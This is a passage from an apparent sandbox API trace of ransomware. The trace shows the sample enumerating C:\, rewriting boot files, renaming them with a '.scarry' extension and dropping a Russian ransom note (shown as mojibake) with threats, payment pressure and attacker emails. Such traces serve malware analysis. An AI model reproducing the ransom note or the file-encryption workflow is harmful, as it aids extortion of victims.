HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0103.281] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.281] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.281] GlobalUnlock (hMem=0x450004) returned 0 [0103.281] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.281] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.281] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.281] GlobalUnlock (hMem=0x450004) returned 0 [0103.281] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.281] GlobalUnlock (hMem=0x45000c) returned 0 [0103.281] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x575308 [0103.281] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0103.282] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, 
ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0103.282] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac8 | out: lpLocalFileTime=0x18fac8) returned 1 [0103.282] FileTimeToDosDateTime (in: lpFileTime=0x18fac8, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.282] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.282] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.282] GlobalUnlock (hMem=0x45000c) returned 0 [0103.282] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.282] GlobalLock (hMem=0x450004) returned 0x588000 [0103.282] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.282] GlobalUnlock (hMem=0x45000c) returned 0 [0103.282] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.282] GlobalUnlock (hMem=0x450004) returned 0 [0103.282] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.282] CharLowerBuffW (in: lpsz="bootmgr", cchLength=0x7 | out: lpsz="bootmgr") returned 0x7 [0103.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.282] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 
lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.283] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac40, cbMultiByte=36, lpWideCharStr=0x18ea64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0103.283] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\bootmgr", cchWideChar=10, lpMultiByteStr=0x18ea40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\bootmgr", lpUsedDefaultChar=0x0) returned 10 [0103.283] CreateFileW (lpFileName="C:\\я" (normalized: "c:\\я"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.289] WriteFile (in: hFile=0x190, lpBuffer=0x1ea1bc8*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18fa70, lpOverlapped=0x0 | out: lpBuffer=0x1ea1bc8*, lpNumberOfBytesWritten=0x18fa70*=0x1, lpOverlapped=0x0) returned 1 [0103.290] CloseHandle (hObject=0x190) returned 1 [0103.292] DeleteFileW (lpFileName="C:\\я" (normalized: "c:\\я")) 
returned 1 [0103.296] FindFirstFileW (in: lpFileName="C:\\bootmgr", lpFindFileData=0x18f804 | out: lpFindFileData=0x18f804*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 0x572d90 [0103.296] FileTimeToLocalFileTime (in: lpFileTime=0x18f818, lpLocalFileTime=0x18f730 | out: lpLocalFileTime=0x18f730) returned 1 [0103.296] FileTimeToDosDateTime (in: lpFileTime=0x18f730, lpFatDate=0x18f7e6, lpFatTime=0x18f7e4 | out: lpFatDate=0x18f7e6, lpFatTime=0x18f7e4) returned 1 [0103.296] FindClose (in: hFindFile=0x572d90 | out: hFindFile=0x572d90) returned 1 [0103.296] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x20) returned 0 [0103.297] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.297] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0xffffffff [0103.297] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0xffffffff [0103.297] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=-1, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f710*=-1) returned 0xffffffff [0103.298] ReadFile (in: hFile=0xffffffff, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18f734, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08, lpNumberOfBytesRead=0x18f734*=0x0, lpOverlapped=0x0) 
returned 0 [0103.298] GlobalLock (hMem=0x450004) returned 0x588000 [0103.299] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.299] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.299] GlobalUnlock (hMem=0x45000c) returned 0 [0103.299] GlobalReAlloc (hMem=0x45000c, dwBytes=0x4000, uFlags=0x2) returned 0x45000c [0103.299] GlobalLock (hMem=0x45000c) returned 0x58e010 [0103.299] GlobalHandle (pMem=0x58e010) returned 0x45000c [0103.299] GlobalUnlock (hMem=0x45000c) returned 0 [0103.299] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0103.300] GlobalLock (hMem=0x45000c) returned 0x592020 [0103.300] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.300] GlobalUnlock (hMem=0x450004) returned 0 [0103.300] GlobalHandle (pMem=0x592020) returned 0x45000c [0103.300] GlobalUnlock (hMem=0x45000c) returned 0 [0103.300] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.300] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.300] GlobalUnlock (hMem=0x45000c) returned 0 [0103.300] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0103.300] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.300] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.300] GlobalUnlock (hMem=0x45000c) returned 0 [0103.300] ReadFile (in: hFile=0xffffffff, lpBuffer=0x1e4d270, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18f734, lpOverlapped=0x0 | out: lpBuffer=0x1e4d270, lpNumberOfBytesRead=0x18f734*=0x0, lpOverlapped=0x0) returned 0 [0103.300] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f728*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f728*=-1) returned 0xffffffff [0103.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x1e79f08, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.300] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=-1, lpDistanceToMoveHigh=0x18f728*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f728*=-1) returned 0xffffffff [0103.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x1e4d270, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18f7ac, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.300] WriteFile (in: hFile=0xffffffff, lpBuffer=0x1ea1b98, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.477] WriteFile (in: hFile=0xffffffff, lpBuffer=0x1e79f28, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18f730, lpOverlapped=0x0) returned 0 [0103.477] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7e018, cbMultiByte=26, lpWideCharStr=0x18e740, cchWideChar=2047 | out: lpWideCharStr="f4Bw=XvJqdf6BYP1mVw.scarry\x18戟矇戤矇ࢭ矍") returned 26 [0103.477] MoveFileW (lpExistingFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), lpNewFileName="C:\\f4Bw=XvJqdf6BYP1mVw.scarry" (normalized: "c:\\f4bw=xvjqdf6byp1mvw.scarry")) returned 1 [0103.478] CreateFileW (lpFileName="C:\\f4Bw=XvJqdf6BYP1mVw.scarry" (normalized: "c:\\f4bw=xvjqdf6byp1mvw.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.478] SetFileTime (hFile=0xffffffff, lpCreationTime=0x18f7d0, lpLastAccessTime=0x18f7c8, lpLastWriteTime=0x18f7c0) returned 0 [0103.478] CloseHandle (hObject=0xffffffff) returned 0 [0103.479] SetFileAttributesW (lpFileName="C:\\f4Bw=XvJqdf6BYP1mVw.scarry", dwFileAttributes=0x27) returned 0 [0103.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, 
cbMultiByte=36, lpWideCharStr=0x18ea68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXTרּ\x18\x03") returned 36 [0103.479] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.479] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.479] GlobalUnlock (hMem=0x45000c) returned 0 [0103.479] GlobalLock (hMem=0x45000c) returned 0x56f100 [0103.479] GlobalLock (hMem=0x450004) returned 0x588000 [0103.479] GlobalHandle (pMem=0x56f100) returned 0x45000c [0103.479] GlobalUnlock (hMem=0x45000c) returned 0 [0103.479] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.479] GlobalUnlock (hMem=0x450004) returned 0 [0103.480] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. 
\r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0103.483] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0103.483] FindFirstFileW (in: lpFileName="C:\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18f81c | out: lpFindFileData=0x18f81c*(dwFileAttributes=0x553a80, ftCreationTime.dwLowDateTime=0x22239048, ftCreationTime.dwHighDateTime=0x550000, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x553a80, nFileSizeHigh=0x2000002, nFileSizeLow=0x9569b257, dwReserved0=0xe4001ffb, dwReserved1=0x78e, cFileName="锈Ǫ磻\x18\x03", cAlternateFileName="")) returned 0xffffffff [0103.483] GetLastError () returned 0x2 [0103.483] CreateFileW (lpFileName="C:\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\èíñòðóêöèÿ ïî ðàñøèôðîâêå 
ôàéëîâ.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.483] WriteFile (in: hFile=0x190, lpBuffer=0x1e7ad38*, nNumberOfBytesToWrite=0xdf9, lpNumberOfBytesWritten=0x18fa24, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesWritten=0x18fa24*=0xdf9, lpOverlapped=0x0) returned 1 [0103.485] CloseHandle (hObject=0x190) returned 1 [0103.507] FindNextFileW (in: hFindFile=0x575308, lpFindFileData=0x18fba4 | out: lpFindFileData=0x18fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0103.507] FileTimeToLocalFileTime (in: lpFileTime=0x18fbb8, lpLocalFileTime=0x18fac4 | out: lpLocalFileTime=0x18fac4) returned 1 [0103.507] FileTimeToDosDateTime (in: lpFileTime=0x18fac4, lpFatDate=0x18fb86, lpFatTime=0x18fb84 | out: lpFatDate=0x18fb86, lpFatTime=0x18fb84) returned 1 [0103.507] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.507] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.507] GlobalUnlock (hMem=0x450004) returned 0 [0103.507] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.507] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.507] GlobalHandle (pMem=0x56f100) returned 0x450004 [0103.507] GlobalUnlock (hMem=0x450004) returned 0 [0103.507] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.507] GlobalUnlock (hMem=0x45000c) returned 0 [0103.507] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.507] CharLowerBuffW (in: lpsz="BOOTSECT.BAK", cchLength=0xc | out: lpsz="bootsect.bak") returned 0xc 
[0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="k", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.507] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sú\x18", lpUsedDefaultChar=0x0) returned 1 
[0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18ea5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bú\x18", lpUsedDefaultChar=0x0) returned 1 [0103.508] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18ea64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXTרּ\x18\x03") returned 36 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\BOOTSECT.BAK", cchWideChar=15, lpMultiByteStr=0x18ea40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\BOOTSECT.BAK", lpUsedDefaultChar=0x0) returned 15 [0103.508] CharLowerBuffW (in: lpsz=".BAK", cchLength=0x4 | out: lpsz=".bak") returned 0x4 [0103.508] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".bak", cchWideChar=4, lpMultiByteStr=0x18ea64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".bakñ", lpUsedDefaultChar=0x0) returned 4 [0103.508] FindFirstFileW (in: lpFileName="C:\\BOOTSECT.BAK", lpFindFileData=0x18f804 | out: lpFindFileData=0x18f804*(dwFileAttributes=0x27, 
ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 0x577df0 [0103.508] FileTimeToLocalFileTime (in: lpFileTime=0x18f818, lpLocalFileTime=0x18f730 | out: lpLocalFileTime=0x18f730) returned 1 [0103.508] FileTimeToDosDateTime (in: lpFileTime=0x18f730, lpFatDate=0x18f7e6, lpFatTime=0x18f7e4 | out: lpFatDate=0x18f7e6, lpFatTime=0x18f7e4) returned 1 [0103.508] FindClose (in: hFindFile=0x577df0 | out: hFindFile=0x577df0) returned 1 [0103.508] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x20) returned 1 [0103.510] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0103.510] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0x0 [0103.510] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0x2000 [0103.510] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f710*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f710*=0) returned 0x0 [0103.510] ReadFile (in: hFile=0x190, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x18f734, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18f734*=0x2000, lpOverlapped=0x0) returned 1 [0103.560] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.560] GlobalLock (hMem=0x450004) returned 0x56f100 [0103.560] GlobalHandle (pMem=0x56f100) 
